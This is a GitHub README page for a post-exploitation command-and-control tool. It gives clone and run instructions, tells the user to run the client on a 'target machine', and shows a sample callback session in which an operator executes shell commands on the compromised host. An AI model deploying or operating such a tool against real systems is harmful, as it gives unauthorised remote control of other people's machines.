Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

krishpranav/PostExploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PostExploit

A simple Post Exploitation C2 Tool

forthebadge forthebadge forthebadge

Installation:

$ git clone https://github.com/krishpranav/PostExploit

Running The Server:

$ python3 server.py

Running The Client:

$ python3 client.py

Usage

  • how to use this tool??
$ run the client script on the target machine
$ and run the server in your machine
  • an example of running a simple powershell command on the target machine by post exploitation method
[*] Received callback from '192.168.0.5'
[+] Command to run?
192.168.0.5> ls -la
[*] Command Sent: ls -la
[*] Command Sent: ls -la
[+] Results from 192.168.0.5
total 32
file one
file two
Morty Proxy This is a proxified and sanitized view of the page, visit original site.